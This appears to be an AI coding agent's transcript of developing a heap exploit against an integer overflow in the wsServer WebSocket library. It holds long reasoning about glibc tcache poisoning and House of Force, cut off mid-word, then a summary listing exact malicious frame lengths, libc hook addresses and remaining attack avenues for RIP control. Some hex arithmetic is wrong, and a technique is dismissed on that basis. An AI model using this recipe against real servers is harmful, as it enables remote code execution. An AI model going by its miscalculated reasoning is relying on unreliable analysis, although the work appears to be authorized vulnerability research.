  1. Open connection 1: handshake allocs/frees go to T1's tcache
  2. Send 2 shaping messages on connection 1: more allocs/frees in T1's tcache
  3. Close connection 1: T1's tcache entries are leaked
  4. Open connection 2: T2's tcache is empty
  5. Send 7 shaping messages on connection 2: each message does 2 frees, filling T2's tcache[5] to capacity (7 entries after 4 messages with some going to fastbin)

Wait, let me trace this more carefully.

Connection 2 handshake:

  • calloc(61) → 64-byte chunk from top (T2's tcache empty, fastbin empty, top)
  • malloc(31) → 48-byte chunk from top
  • free(str) → T2's tcache[2] = {str}, count=1
  • malloc(130) → 144-byte chunk from top
  • free(accept) → T2's tcache[1] = {accept}, count=1
  • free(response) → T2's tcache[7] = {response}, count=1

After handshake: T2's tcache has 1 entry in bins 1, 2, 7.

Connection 2 shaping message 1 (97 bytes):

  • msg: malloc(97) → 0x70 chunk. T2's tcache[5] empty → from top. Let's call it C1.
  • echo: malloc(100) → 0x70 chunk from top. Let's call it D1. Adjacent to C1.
  • free(D1) → T2's tcache[5] = {D1}, count=1
  • free(C1) → T2's tcache[5] = {C1 → D1}, count=2

Shaping message 2:

  • msg: malloc(97) → C1 from tcache[5]. count=1. tcache[5] = {D1}
  • echo: malloc(100) → D1 from tcache[5]. count=0. tcache[5] empty.
  • free(D1) → tcache[5] = {D1}, count=1
  • free(C1) → tcache[5] = {C1 → D1}, count=2

Same pattern. tcache[5] count oscillates between 0 and 2. We never get past 2.

This confirms that on a single connection, tcache for any given bin maxes out at 2 entries.

What about opening multiple connections simultaneously?

If we open connections 1, 2, 3, 4 simultaneously (or in rapid succession), each gets its own thread. They all operate independently.

What if we have all of them send shaping messages and then close? Each thread's tcache leaks. Then the next connection gets a fresh tcache.

This doesn't help accumulate tcache entries or fastbin entries.

Wait, what about having multiple concurrent connections?

If we have connection 1 (thread T1) and connection 2 (thread T2) open simultaneously:

  • T1 does the exploit (overflow)
  • T2 does a malloc after the overflow

But T1 and T2 have different tcaches. T1's overflow corrupts T1's tcache entries. T2 can't see them.

Unless T1 and T2 share the same arena, and we can corrupt fastbins. But we can't get chunks into fastbins.

Hmm, what if we corrupt the arena's malloc_state directly?

The arena's malloc_state contains bins, fastbins, top, etc. If we can locate it and overwrite it with the overflow, we can redirect allocations.

The thread arena's malloc_state is typically at the start of the heap segment. For thread arenas created via mmap, the malloc_state is at the beginning of the mmap'd region.

If the malloc_state is BEFORE our overflow buffer (which it should be, since it's allocated first), we can't reach it with a forward overflow.

I think we need to find a way to make the exploit work on a single thread, without needing subsequent mallocs.

The only code executed after the overflow on the same thread is:

  1. free(fsd.msg_data) at line 1713
  2. onclose callback
  3. close_client

If we can make free(fsd.msg_data) trigger __free_hook, we win. For that, __free_hook needs to be non-NULL. But we haven't written to __free_hook yet.

Unless... we write to __free_hook DURING the overflow. If our overflow data reaches __free_hook, we set it to a function pointer, and then free(msg_data) calls it.

But __free_hook is in libc's BSS, far from the heap. Our overflow goes forward in the heap, not to arbitrary addresses.

What about a partial overwrite of a heap address to redirect it to __free_hook?

If we can overwrite a heap variable that contains a function pointer... but the heap doesn't typically contain function pointers (that's more of a C++ vtable thing).

OK, I think I need to accept the limitations and go with the simplest possible PoC.

Let me reconsider the approach where we DO get RIP control but through a slightly different mechanism.

Approach: Corrupt the msg buffer itself to cause a crash at a controlled address

After the overflow, free(msg_data) is called. If the msg chunk's metadata is corrupted (e.g., its size field), free() may crash in a way that reveals control.

But our overflow goes FORWARD from msg. The chunk metadata is at msg-16 (before msg). We don't corrupt it.

What about corrupting the next chunk's metadata so that when free(msg) triggers consolidation with the next chunk, it crashes?

Actually, free(msg) goes to tcache first (if room). tcache_put doesn't check the next chunk. So no crash from next-chunk metadata corruption.

But what if tcache is full for this bin? Then free(msg) goes to _int_free, which DOES check the next chunk's size. If we've corrupted the next chunk's size to an invalid value, _int_free will abort with "corrupted size vs. prev_size while consolidating" or similar.

But this gives an abort at a glibc assertion, not RIP control. And we can't fill tcache for this bin.

Actually, let me reconsider. Can we fill tcache for the exploit buffer's bin?

The exploit buffer is allocated by read_single_frame as realloc(NULL, f1sz) = malloc(f1sz). This happens ONCE for the exploit. Before that, during shaping, the msg buffers are allocated and freed, going to tcache.

If we use f1sz = 32 (so msg is a 48-byte chunk, tcache[1]):

  • After shaping N messages with 32-byte payloads: tcache[1] has 2 entries (max for single connection)
  • Exploit frame 1: malloc(32) → pops from tcache[1]. count goes to 1.
  • Exploit frame 2: overflow
  • Error path: free(msg_data) → tcache_put. count goes back to 2.

tcache[1] never exceeds 2. So free always goes to tcache, never to fastbin.

UNLESS we make the exploit frame's chunk a different size from the shaping chunks.

If shaping uses 32-byte payloads (48-byte chunks, tcache[1]) and the exploit frame uses a DIFFERENT size, then the exploit buffer goes to a different tcache bin. If that bin is empty, free goes to tcache.

Hmm, this doesn't help either.

What if we use the __free_hook trick differently?

Wait, I just had an idea. What if instead of poisoning tcache to get a chunk at __free_hook, we use the overflow to write a function pointer to a heap location that the server will later use as a callback?

The ws_connection struct has function pointers (onopen, onclose, onmessage) in the ws_server sub-struct. But these are in BSS, not on the heap.

The ws_frame_data struct is on the STACK (it's a local variable in ws_establishconnection). We can't overflow into the stack from the heap.

OK, final idea: Use the thread arena's heap to corrupt the arena header

Thread arenas on glibc 2.31 are allocated via mmap with a specific layout:

[arena header (malloc_state)] [heap chunks...] [top]

The malloc_state is at the start of the mmap'd region. Chunks come after it. If we can overflow all the way to the arena header... but it's at the BEGINNING of the heap, and our buffer is way past it. We'd need to overflow backwards.

This is not feasible.

Let me take a step back and think about what IS achievable.

Given the constraints:

  1. Cross-thread tcache poisoning doesn't work (per-thread tcache)
  2. Can't fill tcache on single connection (max 2 entries per bin)
  3. Can't get chunks into fastbins (same reason)
  4. Can't overflow backwards to reach tcache struct or arena header
  5. After overflow on same thread, only one free (no mallocs)

What CAN we do?

  1. Heap corruption (proven)
  2. Write arbitrary data past the buffer (proven)

The actual RIP control requires either:

  • A subsequent malloc that returns a controlled address (needs tcache/fastbin/bin poisoning)
  • A subsequent use of a corrupted function pointer (needs function pointers on the heap)
  • An immediate crash at a controlled address during free()

For option 3: can we make free() jump to a controlled address?

On glibc 2.31, free() checks __free_hook first:

c
void (*hook) (void *, const void *) = atomic_forced_read (__free_hook);
if (__builtin_expect (hook != NULL, 0))
{
    (*hook)(p, RETURN_ADDRESS (0));
    return;
}

If __free_hook is non-NULL, free() calls it. But __free_hook starts as NULL and we can't write to it from the heap.

Unless... we can find a way to make free() itself crash at a controlled RIP. For example, if the chunk being freed has a corrupted fd pointer, and tcache_put writes to e->key:

c
static __always_inline void
tcache_put (mchunkptr chunk, size_t tc_idx)
{
  tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
  e->key = tcache;
  e->next = tcache->entries[tc_idx];
  tcache->entries[tc_idx] = e;
  ++(tcache->counts[tc_idx]);
}

tcache_put writes to e->key and e->next. If e (the chunk being freed) is at a controlled address... but e is msg_data, which is a heap address. We can't control where e points.

Hmm, what about tcache->entries[tc_idx]? tcache is T1's tcache_perthread_struct. We can't corrupt it.

OK, I think the real answer here is that we need to be smarter about the heap layout.

Let me reconsider the two-connection approach, but this time focusing on what happens when T2 allocates from the arena (not tcache).

When T2's tcache is empty for a given bin, malloc checks:

  1. Fastbins (per-arena)
  2. Small/large bins (per-arena)
  3. Unsorted bin (per-arena)
  4. Top chunk

If T1's overflow corrupts the TOP CHUNK's size field, then when T2 allocates from top, the corrupted size might cause issues.

Actually, that's an interesting idea! What if we corrupt the top chunk?

From the previous GDB run, the chunk after msg WAS the top chunk. If we corrupt the top chunk's size, then when T2 allocates from top:

  • malloc calls _int_malloc → checks bins → falls through to top
  • Splits the top chunk. If the top chunk's size is corrupted to a very large value, the split succeeds but the remainder's size overflows.
  • Or if the size is corrupted to a small value, the top chunk appears too small, and malloc tries to extend the heap via sbrk or mmap.

But corrupting the top chunk to what value? And how does this give us RIP control?

Actually, there's a well-known technique called House of Force: corrupt the top chunk's size to a very large value (like 0xFFFFFFFFFFFFFFFF). Then any large malloc will succeed and return an address calculated from top + requested_size. If we request a specific size, we can make malloc return an arbitrary address.

But House of Force requires:

  1. Overflow into the top chunk's size field ✓ (we can do this!)
  2. A malloc with a controlled size (we control the message size)
  3. The ability to write to the returned address and then use it

Let me trace this:

  1. On connection 1, overflow corrupts the top chunk's size to 0xFFFFFFFFFFFFFFFF

  2. Connection 1's thread exits

  3. Connection 2 starts, same arena (top chunk is still corrupted)

  4. Connection 2's handshake: first malloc is calloc(1, 61). T2's tcache empty → top. Since top's size is huge, malloc(64) splits top and returns a chunk. But where?

    • victim = top (the top chunk)
    • size = chunksize(victim) = 0xFFFFFFFFFFFFFFFF
    • remainder_size = size - nb (nb = 0x50 for malloc(64))
    • remainder = victim + nb
    • New top = remainder
    • Return victim This works fine, returns a chunk from the old top.
  5. Subsequent mallocs on T2 also split from the corrupted top. Eventually, the top pointer wraps around the address space...

Hmm, this doesn't directly give us a chunk at __free_hook. For that, we'd need:

  • Target address for malloc return = &__free_hook - 0x10 (to account for chunk header)
  • Current top = old_top (known, fixed address)
  • malloc size = &__free_hook - 0x10 - old_top - 0x10 = &__free_hook - old_top - 0x20
  • This needs to be a positive, very large number

Actually, House of Force works like this:

  1. Corrupt top_chunk->size to -1 (0xFFFFFFFFFFFFFFFF)
  2. Make a malloc of size delta = target - old_top - chunk_header
  3. The new top becomes old_top + delta = target
  4. Next malloc returns a chunk at target

For our case:

  • target = &__free_hook - sizeof(chunk_header) = 0x7ffff7f9de48 - 16 = 0x7ffff7f9de38
  • old_top = address of the top chunk (known from GDB: 0x7ffff0000c60 + 0x25 aligned... wait, let me recalculate)

From GDB: msg chunk at 0x7ffff0000c60, size 0x25 (which is 0x20 | PREV_INUSE | NON_MAIN_ARENA = 32 with flags). Wait, 0x25 = 37? That doesn't make sense for a chunk size.

Oh wait, I think the GDB output showed the raw chunk metadata. Let me re-read: "chunk at 0x7ffff0000c60, size 0x25 (32 | PREV_INUSE | NON_MAIN_ARENA)". But 0x25 = 37, not 32. Hmm. 0x20 = 32. 0x21 = 33. 0x25 = 37.

Actually, the chunk size field includes flags in the low 3 bits: 0x25 = 0b100101. The actual size is 0x25 & ~7 = 0x20 = 32. Flags: PREV_INUSE (bit 0 = 1), NON_MAIN_ARENA (bit 2 = 1).

So the chunk is 32 bytes (user data: 16 bytes). For f1sz=16, the msg is 16 bytes, fitting exactly in a 32-byte chunk.

The next chunk (top chunk) starts at 0x7ffff0000c60 + 0x20 = 0x7ffff0000c80. From GDB, the corrupted area at 0x7ffff0000c80 had prev_size=0, size=0x21, fd=0x4141... So the top chunk was at 0x7ffff0000c80 and its size was 0x21 & ~7 = 0x20 = 32.

Wait, the top chunk should be very large (the remaining heap space). A size of 0x20 seems too small. Unless the heap was very small.

Actually, for a thread arena created via mmap, the initial heap size is typically 1MB or so. The top chunk should be large. A size of 0x20 (32 bytes) doesn't make sense for the top chunk.

Hmm, maybe the GDB output was showing the corrupted state AFTER the overflow? The original top chunk's size was overwritten by our overflow data. We wrote a fake chunk pattern with size=0x21. That's the corrupted value, not the original.

So the original top chunk was at 0x7ffff0000c80 with some large size. We overwrote it with our pattern (prev_size=0, size=0x21, fd=0x4141...).

This is perfect for House of Force!

Instead of writing a fake chunk pattern, we should write:

  • Overwrite the top chunk's size with 0xFFFFFFFFFFFFFFFF (-1 in signed)

Then on the next connection (T2), we can use House of Force to get a chunk at __free_hook.

Here's the refined plan:

  1. Connection 1 (thread T1): Overflow into the top chunk, set its size to -1
  2. Connection 1 exits: Arena persists with corrupted top chunk
  3. Connection 2 (thread T2): Same arena, top chunk is corrupted
  4. Connection 2 handshake: Multiple mallocs from the corrupted top. The first few succeed normally (splitting from the huge top).
  5. Connection 2 message: Send a message whose size is calculated to make malloc return a chunk at __free_hook - 16

But wait, the handshake happens before we can control anything. The handshake does malloc(61), malloc(31), malloc(130). These all come from the corrupted top chunk. After the handshake, top has advanced by 64 + 48 + 144 = 256 bytes (approximately). Then we send a message whose size causes the echo's malloc to return __free_hook.

Actually, the echo response malloc is: malloc(2 + msg_size + 1). We control msg_size. We want malloc to return __free_hook.

For House of Force:

  • After handshake, top is at old_top + 256 (approximately)
  • We want to malloc such that the returned chunk is at __free_hook - 16
  • Size needed: (__free_hook - 16) - top_after_handshake - 16

But this size might be negative (if __free_hook is before the top). In that case, on glibc 2.31 x86_64, unsigned arithmetic wraps around, and top + huge_size wraps to the target.

Wait, but malloc checks size < remainder_size. If the top chunk's size is 0xFFFFFFFFFFFFFFFF and we request a huge size, nb = request2size(huge_size). The check is nb < remainder_size = nb < 0xFFFFFFFFFFFFFFFF. For any reasonable nb, this passes. But nb could wrap around...

Actually, the malloc code does:

c
if (nb < old_size) {
    new_size = old_size - nb;
    ...
}

Where old_size = 0xFFFFFFFFFFFFFFFF. For nb up to 0xFFFFFFFFFFFFFFFE, this passes. And new_size = 0xFFFFFFFFFFFFFFFF - nb.

But the new top is at old_end + nb (where old_end = old_top + old_size). With old_size = -1:

  • old_end = old_top + 0xFFFFFFFFFFFFFFFF = old_top - 1 (wraps around!)
  • new_top = old_end + nb = old_top - 1 + nb

For the next malloc, it returns the new top. So:

  • First big malloc: returns old_top, advances top by nb1
  • Second malloc: returns new_top = old_top + nb1

To get a chunk at __free_hook:

  • We need old_top + nb1 = &__free_hook - sizeof(header)
  • nb1 = &__free_hook - sizeof(header) - old_top

This could be a very large (or negative) value. But we need to malloc this size. The request size would be nb1 - 2*SIZE_SZ (approximately).

Hmm, but we also need to consider that the malloc for the response has to come from this specific path. Let me trace more carefully.

Actually, for House of Force, we typically do ONE large allocation to move the top to the target, then the NEXT allocation returns the target.

But in our case, the path is:

  1. Corrupt top size on T1
  2. T1 exits
  3. T2 starts, gets same arena
  4. T2's handshake: several mallocs from top. Each one advances top by the chunk size.
  5. T2's message processing: malloc(msg_size) for msg, malloc(response_size) for echo response

We want one of these mallocs to return __free_hook. We'd need to calculate the exact distance from the current top (after handshake mallocs) to __free_hook.

This requires knowing:

  • The exact address of the top chunk after corruption (known from GDB)
  • The exact sizes of all mallocs in the handshake (known: 576 + 64 + 48 + 144 = 832, approximately)
  • The target address: &__free_hook - 16

Let me calculate:

  • Top chunk was at 0x7ffff0000c80 (from GDB)
  • After corrupting its size to -1, any malloc from top will work
  • T2's first malloc: tcache_initmalloc(576) → chunk of ~592 bytes from top
    • New top: 0x7ffff0000c80 + 592 = 0x7ffff0000ed0
  • T2's handshake calloc(1, 61): malloc(61) → 64-byte chunk from top
    • New top: 0x7ffff0000ed0 + 64 = 0x7ffff0000f10
  • T2's handshake base64_encode: malloc(31) → 48-byte chunk from top
    • New top: 0x7ffff0000f10 + 48 = 0x7ffff0000f40
  • T2's handshake malloc(130): → 144-byte chunk from top
    • New top: 0x7ffff0000f40 + 144 = 0x7ffff0000fd0
  • T2's handshake frees: accept → tcache[1], str → tcache[2], response → tcache[7]
    • These don't affect top

Now T2 sends a message. msg_size needs to be chosen so that the echo response malloc returns __free_hook.

Actually, let me reconsider. For House of Force, the key is to make ONE large allocation that moves the top pointer to right before __free_hook. Then the NEXT allocation returns a chunk at __free_hook.

But in our case, the first "user-controlled" malloc on T2 is the msg allocation in read_single_frame. We can make this a specific size. Then the echo response allocation follows.

If msg allocation moves top to right before __free_hook:

  • msg_size such that request2size(msg_size) = &__free_hook - 16 - current_top
  • Then echo response: malloc(2 + msg_size + 1) → returns chunk at __free_hook

But wait, &__free_hook - 16 - current_top might be negative (if __free_hook is before current_top). In that case, request2size would wrap around.

current_top0x7ffff0000fd0 (from calculation above) &__free_hook - 16 = 0x7ffff7f9de38 &__free_hook - 16 - current_top = 0x7ffff7f9de38 - 0x7ffff0000fd0 = 0x7f9dce08 ≈ 2GB

So we'd need a 2GB allocation. That's request2size(0x7f9dce08) = 0x7f9dce10. Can we send a message with this size? The msg allocation is malloc(f1sz) where f1sz is the frame 1 payload size. For a non-FIN frame, f1sz can be up to... well, the server reads from the socket using next_byte(). The maximum read per call is MESSAGE_LENGTH=2048. So the message payload is limited to 2048 bytes in practice.

Wait, no. The msg allocation is realloc(msg, *msg_idx + frame_length + is_fin). For frame 1 (non-FIN), msg_idx = 0, frame_length = f1sz, is_fin = 0. So malloc(f1sz). f1sz is the payload length in the WebSocket frame, which can be up to 2^64 in theory but limited by the socket data.

But read_single_frame reads the payload byte by byte from the socket. To fill a 2GB message, we'd need to send 2GB of data. That's not practical for a PoC.

So House of Force requires too large an allocation.

But wait - we don't need to use the msg allocation for the large jump. We can use the ECHO RESPONSE allocation.

Hmm, but we don't control the echo response's allocation directly. The echo response size is 2 + msg_size + 1. And msg_size is what we send.

The issue is the same: we need a large allocation to make the jump from the heap to libc.

OK so House of Force requires a large allocation, which we can't do through the echo server.

Revised House of Force: Use a NEGATIVE distance

What if the top chunk is BEFORE __free_hook in memory? It is: 0x7ffff0000fd0 < 0x7ffff7f9de38. The distance is positive (~2GB).

What if we go the other way? What if we make top wrap around to __free_hook?

top + 0xFFFFFFFFFFFFFFFF + 1 = top (wraps to same). top + huge_value wraps around. If top + huge_value ≡ &__free_hook (mod 2^64), then huge_value = &__free_hook - top.

huge_value = 0x7ffff7f9de38 - 0x7ffff0000fd0 = 0x7f9dce68 ≈ 2GB.

This is the same calculation. We need to malloc ~2GB. Not practical.

OK so House of Force is out because the heap and libc are too far apart.

What if the heap and libc are closer?

On some systems, the heap is near libc. But on modern Linux, the heap (via mmap for thread arenas) is at a random address (though we disabled ASLR, the addresses are still "random" in the sense that they depend on the mmap layout).

Wait, we disabled ASLR. So the addresses are deterministic. But the heap and libc are still far apart in the address space.

Let me check: thread arena heap is at 0x7ffff0000000 (from GDB: chunk at 0x7ffff0000c60). Libc is mapped at 0x7ffff7dxxxxx (from GDB: system at 0x7ffff7e01290). The distance is 0x7ffff7e01290 - 0x7ffff0000c60 = 0x7e00630 ≈ 2GB. Way too far.

OK, I think I need to accept that with this specific setup (thread arenas, far from libc), we can't directly use House of Force.

Let me reconsider the problem from scratch.

Key constraint: The echo server processes each connection in a separate thread. Each thread has its own tcache. After the overflow, the thread exits without doing any more mallocs.

Possible approaches:

  1. Find a way to affect another thread's tcache or the arena's bins
  2. Find a way to make the same thread do more mallocs after the overflow
  3. Find a completely different exploitation path

For approach 2: What if we use a valid multi-frame message where the overflow happens on a MIDDLE frame, not the last one?

For example: [Frame 1: non-FIN BIN, 16 bytes] [Frame 2: non-FIN CONT, overflow] [Frame 3: FIN CONT, small]

Wait, but frame 2's write loop will try to read ~2^64 bytes and fail. Unless frame 2 has a small frame_length that still causes an overflow.

For an overflow, we need f1sz + frame_length_2 > actual_buffer_size. The buffer was allocated with realloc(NULL, f1sz) = malloc(f1sz). The chunk has request2size(f1sz) bytes of space. If f1sz + frame_length_2 > request2size(f1sz), there's an overflow.

But frame_size = f1sz + frame_length_2. For this to pass the check, frame_size ≤ 16MB. So f1sz + frame_length_2 ≤ 16MB. And for overflow: f1sz + frame_length_2 > request2size(f1sz).

request2size(f1sz)f1sz + 16 (for small f1sz). So f1sz + frame_length_2 > f1sz + 16frame_length_2 > 16.

Wait, this doesn't work because frame_size = f1sz + frame_length_2 is checked. If frame_length_2 > 16, then frame_size > f1sz + 16 ≈ request2size(f1sz). But frame_size ≤ 16MB, and request2size(f1sz) ≈ f1sz + 16. So we'd be overflowing by frame_length_2 - 16 bytes. This is a SMALL overflow!

But does the realloc resize the buffer? realloc(msg, msg_idx + frame_length_2 + is_fin). For frame 2 (non-FIN CONT), msg_idx = f1sz, frame_length_2 = desired, is_fin = 0. So realloc(msg, f1sz + frame_length_2). Since f1sz + frame_length_2 = frame_size ≤ 16MB, this is a legitimate realloc! It would GROW the buffer to fit. No overflow.

OH. The realloc only underflows when the SIZE wraps around due to the integer overflow. Without wrapping, it's a legitimate allocation that fits the data. The overflow only happens because the realloc size wraps to a tiny value, while the write loop uses the original (huge) frame_length.

So the integer overflow in *frame_size += frame_length is ESSENTIAL. Without it, there's no overflow. And with it, the frame_length is ~2^64, making the write loop infeasible to complete.

This means the write loop ALWAYS fails after writing some bytes (our overflow), and the thread ALWAYS errors out.

Given this fundamental constraint, let me think about what CAN be achieved.

The overflow writes some bytes past the buffer. On the same thread, the only thing that happens after is free(msg_data). We need free(msg_data) to somehow trigger RIP control.

For free(msg_data):

  1. Check tcache: if room, tcache_put and return. No crash.
  2. If tcache full: _int_free, which does more checks.

On T1, tcache[1] (for 48-byte chunks) has at most 2 entries. So tcache is never full. free() always goes to tcache. No crash.

What if we make the chunk size indicate a DIFFERENT bin that has a full tcache?

We can't change the chunk's size (it's before the buffer in memory).

What if we use a different f1sz that results in a larger chunk, and we've filled tcache for that bin through shaping?

If we use f1sz = 97 (0x70 chunk), and we've done 4 shaping messages of 97 bytes:

  • tcache[5] has 2 entries (max for single connection)

Same problem. tcache never fills past 2.

Wait, what if we use MULTIPLE DIFFERENT sizes for shaping to fill tcache for a specific bin?

Actually, the issue is that each echo round-trip produces exactly 2 frees for the same bin. We can't accumulate more.

Unless... we DON'T drain the echo responses! If we send messages faster than we read responses, the server's send buffer fills up and SEND() blocks. Then the onmessage thread is stuck in ws_sendframe_internal, holding the response buffer. The msg buffer has already been freed.

Wait, let me re-read the code:

c
// ws_establishconnection, line 1752
while (next_complete_frame(&wfd) >= 0)
{
    if ((wfd.frame_type == WS_FR_OP_TXT ||
        wfd.frame_type == WS_FR_OP_BIN) && !wfd.error)
    {
        client->ws_srv.evs.onmessage(...);
    }
    // ...
    free(wfd.msg);  // Line 1781

onmessage is called, which does ws_sendframe_bcastws_sendframe_internal. In ws_sendframe_internal, the response is allocated, sent, and freed. Then control returns to onmessage, which returns. Then free(wfd.msg) is called.

If SEND blocks (because the client's recv buffer is full), the response stays allocated. The thread is blocked. Meanwhile, the next message can't be processed because we're still in onmessage.

So on a single connection, we can only have ONE outstanding response at a time. We can't accumulate free chunks.

Unless... we use BROADCAST to multiple connections! ws_sendframe_bcast sends to ALL clients on port 8080. If we have connections A, B, C all connected, a message on A triggers a broadcast to A, B, C. Each broadcast allocates ONE response buffer, sends to all, then frees it. So still only one extra allocation.

Hmm. What about ws_sendframe_bin_bcast? Same thing - one allocation per call.

OK, I'm now fairly convinced that with the current echo server architecture, we can't fill tcache beyond 2 entries per bin on a single thread, and we can't get chunks into fastbins.

But wait - what about printf?

The printf in onopen and onmessage may allocate a buffer for stdout. On the first call, printf allocates a buffer (typically 8192 bytes or the block size of the output). This is a large allocation that goes to a large bin or unsorted bin.

But this is a one-time allocation. It doesn't free or accumulate.

What about the tcache_init allocation?

When T1's first malloc triggers tcache_init, it allocates a 576-byte chunk for the tcache_perthread_struct. This is a 592-byte chunk (or similar). It's allocated once and never freed.

This doesn't help with tcache filling.

**OK, I'm going to take a completely different approach. Let me reconsider whether T1 and T2 might share the same t

zai-coding-plan
zai-coding-plan / glm-5-turbo
Step

Goal

Create a security PoC that proves RIP register manipulation via an integer-overflow heap overwrite vulnerability in the wsServer C library. The user is a co-creator of wsServer and discovered this vulnerability. The ultimate goal is a regression test, but the immediate step is a network-based exploration PoC demonstrating RIP control on a server built with all compiler protections disabled.

Instructions

  • The PoC must be network-based (connects to a running wsServer instance over TCP, not file-based via ws_file).
  • The server must be built with all protections disabled: no ASLR, no PIE, no stack canary, no RELRO, no NX, no FORTIFY_SOURCE.
  • The target environment is a Docker container running Ubuntu 20.04 (glibc 2.31) because the host system has glibc 2.39 (which removed __free_hook, has safe-linking, and tcache key validation — too complex for a PoC).
  • Follow the repo's coding style: tabs, Allman braces, 85-col limit, C89 comments only (/* */), Doxygen for functions/structs.
  • Honor existing AGENTS.md conventions.

Discoveries

Vulnerability Details (confirmed by code review + GDB)

  • Location: read_single_frame() in src/ws.c:1410-1552
  • Line 1453: *frame_size += fsd->frame_length — unchecked 64-bit addition, wraps around
  • Line 1463: if (*frame_size > MAX_FRAME_LENGTH) — check is defeated by the wrapped small value
  • Line 1505: realloc(msg, *msg_idx + fsd->frame_length + fsd->is_fin) — allocation size also wraps to ~6 bytes
  • Lines 1519-1527: write loop uses original (huge) fsd->frame_length, writing far past the undersized buffer

Exploit Arithmetic (verified by GDB)

  • Frame 1: non-FIN binary, 16 bytes → sets msg_idx=16, frame_size=16
  • Frame 2: FIN continuation, frame_length = 0xFFFFFFFFFFFFFFF5
  • *frame_size += frame_length → 16 + 0xFFF...F5 wraps to 5 → passes MAX_FRAME_LENGTH check
  • realloc(msg, 16 + 0xFFF...F5 + 1) wraps to 6 → tiny allocation, same pointer returned
  • Write loop starts at msg[16], writing far past the 32-byte chunk boundary → heap corruption confirmed

GDB Reconnaissance Results (from successful run)

  • Libc addresses (no ASLR, fixed):
    • __free_hook = 0x7ffff7f9de48
    • __malloc_hook = 0x7ffff7f9bb70
    • system = 0x7ffff7e01290
    • exit = 0x7ffff7df5a40
  • msg buffer: chunk at 0x7ffff0000c60, size 0x25 (raw; actual size = 0x20 = 32 bytes, with PREV_INUSE | NON_MAIN_ARENA flags), user data at 0x7ffff0000c70
  • Chunk is in a thread arena (NON_MAIN_ARENA flag set) — allocated via mmap, address range 0x7ffff0000000+
  • Write loop error at msg_idx=144 (16 + 128 = 144, matching our 128-byte overflow)
  • Corrupted area confirmed at 0x7ffff0000c80: prev_size=0, size=0x21, fd=0x4141414141414141
  • Server survivedfree(msg) goes to tcache BEFORE the next-chunk size check
  • The next chunk after msg is the TOP CHUNK, not a free tcache chunk

Why the Server Survives

On glibc 2.31, free() checks tcache BEFORE checking the next chunk's size:

c
if (tc_idx < mp_.tcache_bins && tcache && tcache->counts[tc_idx] < mp_.tcache_count) {
    tcache_put(p, tc_idx);
    return;  // never reaches the corrupted next-chunk check
}

Critical Problem: Per-Thread Tcache Defeats Cross-Thread Tcache Poisoning

This is the central unsolved problem. The most recent analysis (the interrupted reasoning block) exhaustively analyzed why the previously planned tcache poisoning strategy does NOT work:

  1. wsServer creates a new pthread per connection (ws_establishconnection). Connection 1 runs in thread T1, connection 2 in thread T2.
  2. tcache is per-thread on glibc 2.31. Each thread has its own tcache_perthread_struct (576 bytes, allocated as the FIRST chunk on the thread arena heap). T1's poisoned tcache is invisible to T2.
  3. When T1 exits, its tcache entries are "leaked" — the chunks are in the heap but not in any arena-level free list. T2 starts with a fresh, empty tcache.
  4. The echo server architecture prevents filling tcache beyond 2 entries per bin on a single connection. Each echo round-trip does exactly: malloc(msg)onmessagemalloc(response)free(response)free(msg). The tcache count oscillates between 0 and 2, never reaching the capacity of 7.
  5. Because tcache never fills, frees never fall through to fastbins (arena-level, potentially shared between threads that reuse the same arena).
  6. T1 and T2 likely share the same arena (T2 reuses T1's freed arena from the arena free list), but since no chunks reach arena-level bins, this sharing is irrelevant.

Exhaustively Analyzed and Rejected Approaches

The interrupted analysis considered and rejected the following approaches:

  1. Cross-thread tcache poisoning (original plan from previous session) — REJECTED: per-thread tcache, entries leaked on thread exit
  2. Fill tcache → overflow to fastbin — REJECTED: can't fill tcache beyond 2 entries with echo server
  3. Fastbin poisoning to __malloc_hook - 0x23 (classic 0x7f trick) — REJECTED: same tcache-filling problem
  4. House of Force (corrupt top chunk size to -1) — REJECTED: heap (0x7ffff0000000+) is ~2GB away from libc (0x7ffff7d00000+); would require a ~2GB allocation to bridge the gap, not feasible through WebSocket messages
  5. Overflow into tcache_perthread_struct — REJECTED: struct is the FIRST allocation on the heap (before our buffer); overflow goes forward only
  6. Overflow into arena header (malloc_state) — REJECTED: also at the beginning of the heap
  7. Same-thread exploitation after overflow — REJECTED: after the write loop hits EOF, the only code executed is free(fsd.msg_data) (goes to tcache, no crash) then onclose (no mallocs) then thread exit. No subsequent mallocs on T1.
  8. Unsorted bin attack — REJECTED: same tcache-filling prerequisite
  9. Interleaving PING between exploit frames — REJECTED: PONG allocates+frees on same thread, same tcache bin issue; doesn't create persistent arena-level free chunks
  10. Overflow wrapping msg_idx to write to arbitrary address — REJECTED: would require sending ~2^64 bytes to the socket
  11. Corrupting chunk metadata to crash free() — REJECTED: free() goes to tcache which doesn't check next-chunk metadata

Approaches NOT Yet Fully Analyzed (Potential Avenues)

  1. Overwrite the tcache_perthread_struct of a DIFFERENT thread — T2's tcache struct doesn't exist at overflow time (allocated on T2's first malloc, after T1 exits). BUT: what if T1 and T2 are concurrent (both alive during the overflow)? If T2 is already running when T1 does the overflow, T2's tcache struct IS on the heap and potentially reachable. This requires T2 to be connected before T1 sends the exploit frames.

  2. Use ws_sendframe_bcast to trigger malloc on T2's thread — When T1 sends a message, ws_sendframe_bcast locks a mutex and iterates clients. The malloc(response) happens on T1's thread, not T2's. But if the broadcast SEND blocks (T2's recv buffer full), T1 is stuck holding the response allocation. Not directly useful.

  3. Overflow into T2's tcache_perthread_struct while T2 is alive — If T2 is connected and has done its first malloc (tcache initialized), its tcache struct is on the heap. If we can shape the heap so T2's tcache struct is adjacent to T1's overflow buffer, we can overwrite T2's tcache entries directly, setting entries[X] = &__free_hook and counts[X] = 1. Then T2's next malloc of that size returns &__free_hook. This is promising but requires precise heap layout control across two threads sharing one arena.

  4. Corrupt the top chunk to cause a crash during T2's malloc — Not RIP control, but could demonstrate impact. Less interesting for the PoC.

  5. Use a single-threaded server — If we modify the echo server to use .thread_loop = 1 and process connections sequentially in the main thread, the tcache problem disappears entirely. The main thread uses the main arena. This is the simplest solution but requires changing the test server configuration.

  6. Use the close_client path more carefully — The close_client function destroys mutexes. If a mutex's internal state is corrupted, pthread_mutex_destroy might crash. But this is unreliable.

